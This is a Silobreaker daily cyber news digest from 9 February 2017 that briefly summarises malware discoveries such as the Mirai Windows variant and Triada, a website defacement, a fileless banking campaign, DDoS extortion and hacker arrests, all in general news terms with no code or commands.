Silobreaker Daily Cyber Digest – 9 February 2017
Mirai discovered in new Windows variant
Dr. Web have discovered a new strain of the Mirai Trojan– a Windows variant- infecting more IoT devices for the purpose of carrying out DDoS attacks. Trojan.Mirai.1 was written in C++ and scans TCP ports from the indicated range of IP addresses in order to execute various commands and distributing other malware. More information.
Triada becomes top mobile malware threat
Triada, a modular backdoor for Android, became the most prolific mobile malware last month according to Checkpoint researchers. It bypassed the notorious Hummingbad malware, an Android malware which can establish a persistent rootkit on a device. Triada is notable for granting the malicious actor super-user privileges on infected devices. This allows it to download additional malware and spoof URLs. More information.
Leaks and Breaches
Kurdish hacker defaces NHS trust website
Kurdish hacker MuhmadEmad targeted the Dudley and Walsall Mental Health Partnership NHS Trust in an ongoing defacement campaign which has mainly targeted Irish organisations. The Trust’s home page was replaced on Sunday to display the message: ‘hacked by MuhmadEmad Long Live to Peshmerga’. Emad reportedly exploited a vulnerability in the WordPress site hosted by IT service provider TeraFirma. According to a newspaper outlet, two schools, a pub and a holiday website in the West Midlands suffered similar attacks. More information.
Stealthy campaign targets 140 banks and telecommunications companies
Researchers at Kaspersky Labs have discovered a new campaign targeting over 140 banks, telecommunications companies and government organisations across multiple continents. The campaign harnesses widely available penetration-testing and administration tools as well as the PowerShell framework for task automation in Windows. The attacks deploy malicious code residing only in memory, and those behind them have gone to great lengths to avoid writing files onto the hard drive of compromised devices. The assailants remain present on infected devices just long enough to gather information and their traces are wiped from the system on first reboot. More information.
Hackers disguise malware in report on Trump’s victory
Hackers have been observed using a document disguised as a report on the new US President. Targeting Mac users, the attack uses macros embedded in a malicious file sharing the title of a genuine Carnegie report. The document name, as well as the sophisticated operational security used in the campaign, indicate the involvement of an Advanced Persistent Threat. More information.
Taiwanese authorities launch investigation after cyber attack threats
Taiwan has launched an investigation after five brokerages in the country received threats from hackers seeking payment to prevent DDoS attacks. The victims received an email with a deadline for transferring a bitcoin ransom payment of almost $10,000. The emails were sent under the name Armada Collective, linking them to the hacker collective using that name. The Financial Supervisory Commission has since confirmed that none of the companies made the payment. More information.
Russia arrests 9 suspected hackers with alleged ties to hacker collective Lurk
Nine individuals suspected of stealing £13.5 million from bank accounts since 2013, have been arrested by Russian authorities. Security sources have informed news outlets that the individuals are connected to a case against hacking collective Lurk, which is accused of stealing as much as 3 billion roubles from various organisations. Russian authorities also suspect that the hackers managed to breach critical Russian infrastructure including military plants. More information.
The Silobreaker Team
Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.